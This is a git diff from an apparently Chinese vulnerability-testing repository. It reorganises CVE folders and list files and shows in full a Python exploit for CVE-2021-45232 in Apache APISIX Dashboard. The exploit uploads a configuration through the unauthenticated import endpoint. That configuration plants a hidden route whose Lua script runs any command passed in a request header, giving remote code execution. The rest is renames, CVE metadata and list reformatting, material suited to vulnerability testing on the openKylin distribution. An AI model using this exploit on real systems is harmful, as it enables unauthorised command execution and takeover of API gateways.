diff --git a/cve/Apache-APISIX/2021/cve-2021-45232/RedMe.md b/cve/apache-Apsix/2021/cve-2021-45232/RedMe.md similarity index 100% rename from cve/Apache-APISIX/2021/cve-2021-45232/RedMe.md rename to cve/apache-Apsix/2021/cve-2021-45232/RedMe.md diff --git a/cve/Apache-APISIX/2021/cve-2021-45232/apisix_dashboard_rce.py b/cve/apache-Apsix/2021/cve-2021-45232/apisix_dashboard_rce.py similarity index 96% rename from cve/Apache-APISIX/2021/cve-2021-45232/apisix_dashboard_rce.py rename to cve/apache-Apsix/2021/cve-2021-45232/apisix_dashboard_rce.py index edd12c9f1d0ba6168ef5179a32a544486d7213dc..30ebcda546ab809f8b935e7353fefaf31542893e 100644 --- a/cve/Apache-APISIX/2021/cve-2021-45232/apisix_dashboard_rce.py +++ b/cve/apache-Apsix/2021/cve-2021-45232/apisix_dashboard_rce.py @@ -1,93 +1,93 @@ -#!/usr/bin/env python3 -import zlib -import json -import random -import requests -import string -import sys -from urllib3.exceptions import InsecureRequestWarning - -# Suppress only the single warning from urllib3 needed. -requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) - - -eval_config = { - "Counsumers": [], - "Routes": [ - { - "id": str(random.randint(100000000000000000, 1000000000000000000)), - "create_time": 1640674554, - "update_time": 1640677637, - "uris": [ - "/rce" - ], - "name": "rce", - "methods": [ - "GET", - "POST", - "PUT", - "DELETE", - "PATCH", - "HEAD", - "OPTIONS", - "CONNECT", - "TRACE" - ], - "script": "local file = io.popen(ngx.req.get_headers()['cmd'],'r') \n local output = file:read('*all') \n file:close() \n ngx.say(output)", - "status": 1 - } - ], - "Services": [], - "SSLs": [], - "Upstreams": [], - "Scripts": [], - "GlobalPlugins": [], - "PluginConfigs": [] -} - - -def random_str(): - return ''.join(random.choices(string.ascii_letters + string.digits, k=6)) - - -def calc_crc(data): - crc32 = zlib.crc32(data) & 0xffffffff - return crc32.to_bytes(4, byteorder="big") - - -def export_data(url): - r = requests.get(url + "/apisix/admin/migrate/export", verify=False) - return r.text[:-4] - - -def import_data(url, data): - data = json.dumps(data).encode() - crc32 = calc_crc(data) - - files = {"file": ("data", data + crc32, "text/data")} - resp = requests.post(url + "/apisix/admin/migrate/import", files=files, verify=False) - # print(resp.text) - if resp.json().get("code", -1) == 0: - return True - else: - return False - - -if __name__ == "__main__": - if len(sys.argv) != 2: - print("python " + sys.argv[0] + " http://127.0.0.1:9000") - exit() - - url = sys.argv[1] - if url.endswith("/"): - url = url[:-1] - - uri = random_str() - eval_config["Routes"][0]["uris"] = [ "/" + uri] - eval_config["Routes"][0]["name"] = uri - - if import_data(url, eval_config): - print("attack success") - print("uri is: " + "/" + uri) - else: +#!/usr/bin/env python3 +import zlib +import json +import random +import requests +import string +import sys +from urllib3.exceptions import InsecureRequestWarning + +# Suppress only the single warning from urllib3 needed. +requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) + + +eval_config = { + "Counsumers": [], + "Routes": [ + { + "id": str(random.randint(100000000000000000, 1000000000000000000)), + "create_time": 1640674554, + "update_time": 1640677637, + "uris": [ + "/rce" + ], + "name": "rce", + "methods": [ + "GET", + "POST", + "PUT", + "DELETE", + "PATCH", + "HEAD", + "OPTIONS", + "CONNECT", + "TRACE" + ], + "script": "local file = io.popen(ngx.req.get_headers()['cmd'],'r') \n local output = file:read('*all') \n file:close() \n ngx.say(output)", + "status": 1 + } + ], + "Services": [], + "SSLs": [], + "Upstreams": [], + "Scripts": [], + "GlobalPlugins": [], + "PluginConfigs": [] +} + + +def random_str(): + return ''.join(random.choices(string.ascii_letters + string.digits, k=6)) + + +def calc_crc(data): + crc32 = zlib.crc32(data) & 0xffffffff + return crc32.to_bytes(4, byteorder="big") + + +def export_data(url): + r = requests.get(url + "/apisix/admin/migrate/export", verify=False) + return r.text[:-4] + + +def import_data(url, data): + data = json.dumps(data).encode() + crc32 = calc_crc(data) + + files = {"file": ("data", data + crc32, "text/data")} + resp = requests.post(url + "/apisix/admin/migrate/import", files=files, verify=False) + # print(resp.text) + if resp.json().get("code", -1) == 0: + return True + else: + return False + + +if __name__ == "__main__": + if len(sys.argv) != 2: + print("python " + sys.argv[0] + " http://127.0.0.1:9000") + exit() + + url = sys.argv[1] + if url.endswith("/"): + url = url[:-1] + + uri = random_str() + eval_config["Routes"][0]["uris"] = [ "/" + uri] + eval_config["Routes"][0]["name"] = uri + + if import_data(url, eval_config): + print("attack success") + print("uri is: " + "/" + uri) + else: print("attack error") \ No newline at end of file diff --git a/cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml b/cve/apache-Apsix/2021/yaml/cve-2021-45232.yaml similarity index 89% rename from cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml rename to cve/apache-Apsix/2021/yaml/cve-2021-45232.yaml index ad102017e26ecb22741a65bbfed063bfe70dcce9..0a99c9b66858d5a8f25de8bf9f1024a4b8cf27e7 100644 --- a/cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml +++ b/cve/apache-Apsix/2021/yaml/cve-2021-45232.yaml @@ -1,22 +1,22 @@ -id: CVE-2021-45232 -source: https://github.com/wuppp/cve-2021-45232-exp -info: - name: Apache APISIX Dashboard 是 Apache APISIX 网关 的可视化管理界面。 - severity: CRITICAL - description: - CVE-2021-45232 中,攻击者可构造恶意请求,获取到 apisix 的配置文件信息,或者利用其他接口导入恶意配置,利用APISIX Script功能从而执行任意命令。 - scope-of-influence: - In Apache APISIX Dashboard before 2.10.1 - reference: - - http://www.openwall.com/lists/oss-security/2021/12/27/1 - - https://apisix.apache.org/blog/2021/12/28/dashboard-cve-2021-45232 - - https://lists.apache.org/thread/979qbl6vlm8269fopfyygnxofgqyn6k5 - - https://seclists.org/oss-sec/2021/q4/180 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-45232 - cwe-id: CWE-306 - cnvd-id: None - kve-id: None +id: CVE-2021-45232 +source: https://github.com/wuppp/cve-2021-45232-exp +info: + name: Apache APISIX Dashboard 是 Apache APISIX 网关 的可视化管理界面。 + severity: CRITICAL + description: + CVE-2021-45232 中,攻击者可构造恶意请求,获取到 apisix 的配置文件信息,或者利用其他接口导入恶意配置,利用APISIX Script功能从而执行任意命令。 + scope-of-influence: + In Apache APISIX Dashboard before 2.10.1 + reference: + - http://www.openwall.com/lists/oss-security/2021/12/27/1 + - https://apisix.apache.org/blog/2021/12/28/dashboard-cve-2021-45232 + - https://lists.apache.org/thread/979qbl6vlm8269fopfyygnxofgqyn6k5 + - https://seclists.org/oss-sec/2021/q4/180 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-45232 + cwe-id: CWE-306 + cnvd-id: None + kve-id: None tags: cve2021 \ No newline at end of file diff --git a/cve/Apache-APISIX/2022/cve-2022-24112/README.md b/cve/apache-Apsix/2022/cve-2022-24112/README.md similarity index 100% rename from cve/Apache-APISIX/2022/cve-2022-24112/README.md rename to cve/apache-Apsix/2022/cve-2022-24112/README.md diff --git a/cve/Apache-APISIX/2022/cve-2022-24112/apisix-exploit.py b/cve/apache-Apsix/2022/cve-2022-24112/apisix-exploit.py similarity index 100% rename from cve/Apache-APISIX/2022/cve-2022-24112/apisix-exploit.py rename to cve/apache-Apsix/2022/cve-2022-24112/apisix-exploit.py diff --git a/cve/Apache-APISIX/2022/yaml/CVE-2022-24112.yaml b/cve/apache-Apsix/2022/yaml/CVE-2022-24112.yaml similarity index 100% rename from cve/Apache-APISIX/2022/yaml/CVE-2022-24112.yaml rename to cve/apache-Apsix/2022/yaml/CVE-2022-24112.yaml diff --git a/cve/apache/2020/CVE-2020-9490/README.md b/cve/apache-Httpd/2020/CVE-2020-9490/README.md similarity index 100% rename from cve/apache/2020/CVE-2020-9490/README.md rename to cve/apache-Httpd/2020/CVE-2020-9490/README.md diff --git a/cve/apache/2020/CVE-2020-9490/apache_poc.py b/cve/apache-Httpd/2020/CVE-2020-9490/apache_poc.py similarity index 100% rename from cve/apache/2020/CVE-2020-9490/apache_poc.py rename to cve/apache-Httpd/2020/CVE-2020-9490/apache_poc.py diff --git a/cve/apache/2020/yaml/CVE-2020-9490.yaml b/cve/apache-Httpd/2020/yaml/CVE-2020-9490.yaml similarity index 100% rename from cve/apache/2020/yaml/CVE-2020-9490.yaml rename to cve/apache-Httpd/2020/yaml/CVE-2020-9490.yaml diff --git a/cve/apache/2021/CVE-2021-41773/README.md b/cve/apache-Httpd/2021/CVE-2021-41773/README.md similarity index 100% rename from cve/apache/2021/CVE-2021-41773/README.md rename to cve/apache-Httpd/2021/CVE-2021-41773/README.md diff --git a/cve/apache/2021/CVE-2021-41773/exploit.py b/cve/apache-Httpd/2021/CVE-2021-41773/exploit.py similarity index 100% rename from cve/apache/2021/CVE-2021-41773/exploit.py rename to cve/apache-Httpd/2021/CVE-2021-41773/exploit.py diff --git a/cve/apache/2021/CVE-2021-41773/screenshots/Pasted image 20220313024756.png b/cve/apache-Httpd/2021/CVE-2021-41773/screenshots/Pasted image 20220313024756.png similarity index 100% rename from cve/apache/2021/CVE-2021-41773/screenshots/Pasted image 20220313024756.png rename to cve/apache-Httpd/2021/CVE-2021-41773/screenshots/Pasted image 20220313024756.png diff --git a/cve/apache/2021/CVE-2021-41773/screenshots/Pasted image 20220313024903.png b/cve/apache-Httpd/2021/CVE-2021-41773/screenshots/Pasted image 20220313024903.png similarity index 100% rename from cve/apache/2021/CVE-2021-41773/screenshots/Pasted image 20220313024903.png rename to cve/apache-Httpd/2021/CVE-2021-41773/screenshots/Pasted image 20220313024903.png diff --git a/cve/apache/2021/CVE-2021-42013/PoC.sh b/cve/apache-Httpd/2021/CVE-2021-42013/PoC.sh similarity index 100% rename from cve/apache/2021/CVE-2021-42013/PoC.sh rename to cve/apache-Httpd/2021/CVE-2021-42013/PoC.sh diff --git a/cve/apache/2021/CVE-2021-42013/README.md b/cve/apache-Httpd/2021/CVE-2021-42013/README.md similarity index 100% rename from cve/apache/2021/CVE-2021-42013/README.md rename to cve/apache-Httpd/2021/CVE-2021-42013/README.md diff --git a/cve/apache/2021/CVE-2021-42013/apache.png b/cve/apache-Httpd/2021/CVE-2021-42013/apache.png similarity index 100% rename from cve/apache/2021/CVE-2021-42013/apache.png rename to cve/apache-Httpd/2021/CVE-2021-42013/apache.png diff --git a/cve/apache/2021/yaml/CVE-2021-41773.yaml b/cve/apache-Httpd/2021/yaml/CVE-2021-41773.yaml similarity index 100% rename from cve/apache/2021/yaml/CVE-2021-41773.yaml rename to cve/apache-Httpd/2021/yaml/CVE-2021-41773.yaml diff --git a/cve/apache/2021/yaml/CVE-2021-42013.yaml b/cve/apache-Httpd/2021/yaml/CVE-2021-42013.yaml similarity index 100% rename from cve/apache/2021/yaml/CVE-2021-42013.yaml rename to cve/apache-Httpd/2021/yaml/CVE-2021-42013.yaml diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 34ad6d5929c852dce5d65fdebb786af503a5737f..a6752cdab4cc030af61fc0b367ebeafcccf8e664 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -1,13 +1,13 @@ #仓库收录漏洞列表,列表中的测试用例在openKylin发行版上测试通过,用例有效。 cve: - apache: + apache-Httpd: - CVE-2020-9490 - CVE-2021-41773 - CVE-2021-42013 - apache-APISIX: + apache-Apisix: - CVE-2022-24112 - CVE-2021-45232 - apache-activemq: + apache-Activemq: - CVE-2020-13932 apache-CouchDB: - CVE-2022-24706 @@ -22,32 +22,31 @@ cve: - CVE-2021-26295 apache-Airflow: - CVE-2020-11978 - apache-log4j: + apache-Log4j: - CVE-2021-44228 - apache-solr: + apache-Solr: - CVE-2021-27905 - CVE-2019-0193 - apache-tomcat: + apache-Tomcat: - CVE-2022-29885 - CVE-2020-9484 - CVE-2020-1938 - CVE-2017-12617 + - CVE-2020-13935 apache-Spark: - CVE-2022-33891 apache-Flink: - CVE-2020-17518 - apache-tomcat: - - CVE-2020-13935 - apache-unomi: + apache-Unomi: - CVE-2020-13942 - apache-struts: + apache-Struts: - CVE-2019-0230 apache-Shiro: - CVE-2022-32532 - Influx-DB: - - CVE-2019-20933 apache-Commons: - CVE-2022-33980 + influx-DB: + - CVE-2019-20933 linux-kernel: - CVE-2021-4204 - CVE-2021-29155 @@ -170,17 +169,19 @@ cve: - CVE-2022-22965 - CVE-2022-22963 - CVE-2022-31692 + java-SE: + - CVE-2022-21449 webmin: - CVE-2019-12840 - CVE-2022-0824 - CVE-2022-36446 - CVE-2019-15107 - Zimbra: + zimbra: - CVE-2022-27925 - CVE-2022-37042 - Grafana: + grafana: - CVE-2021-43798 - Froxlor: + froxlor: - CVE-2021-42325 - CVE-2023-0315 - CVE-2023-0877 @@ -197,5 +198,4 @@ kve: - KVE-2022-0206 kylin-activation: - KVE-2022-0231 - Java-SE: - - CVE-2022-21449 + diff --git a/other_list.yaml b/other_list.yaml index bf286e5e168d9fb0df17b53b0f28e89985c18fb9..ea9254993a1143b2ef3a3f4c841b1f2516f4128b 100644 --- a/other_list.yaml +++ b/other_list.yaml @@ -19,11 +19,11 @@ cve: - CVE-2017-16995 polkit: - CVE-2021-3560 - Outlook: + outlook: - CVE-2023-23397 redis: - CVE-2022-0543 - EsFileExplorer: + esFileExplorer: - CVE-2019-6447 docker: - CVE-2019-5736 @@ -47,27 +47,25 @@ cve: - CVE-2022-34265 sudo: - CVE-2019-14287 - MinIO: + minIO: - CVE-2023-28432 - CVE-2023-28434 - WebLogic: + webLogic: - CVE-2023-21839 - Node.js: + node.js: - CVE-2021-21315 zabbix: - CVE-2022-23131 weblogic: - CVE-2022-2555 - CVE-2021-2109 - Zyxel: + zyxel: - CVE-2022-30525 - Gitlab: + gitlab: - CVE-2022-1175 -cnvd: - WordPress: + wordPress: - CVE-2019-8942 - CVE-2023-23488 - Zimbra: + zimbra: - CVE-2022-41352 cnvd: - diff --git "a/\346\274\217\346\264\236\346\250\241\347\211\210.yaml" "b/\346\274\217\346\264\236\346\250\241\347\211\210.yaml" index 1de85f71f54e22f3e557618d5ad800d42ff653e7..1de22702afdc6fa56088a555a066ad4906bf8a88 100644 --- "a/\346\274\217\346\264\236\346\250\241\347\211\210.yaml" +++ "b/\346\274\217\346\264\236\346\250\241\347\211\210.yaml" @@ -10,10 +10,10 @@ info: reference: - 漏洞相关链接 classification: - cvss-metrics: CVSS:3.1 + cvss-metrics: CVSS向量 cvss-score: 漏洞评分 - cve-id: - cwe-id: - cnvd-id: - kve-id: + cve-id: CVE漏洞编号 + cwe-id: CWE编号 + cnvd-id: CNVD编号 + kve-id: KVE编号 tags: 漏洞标签 \ No newline at end of file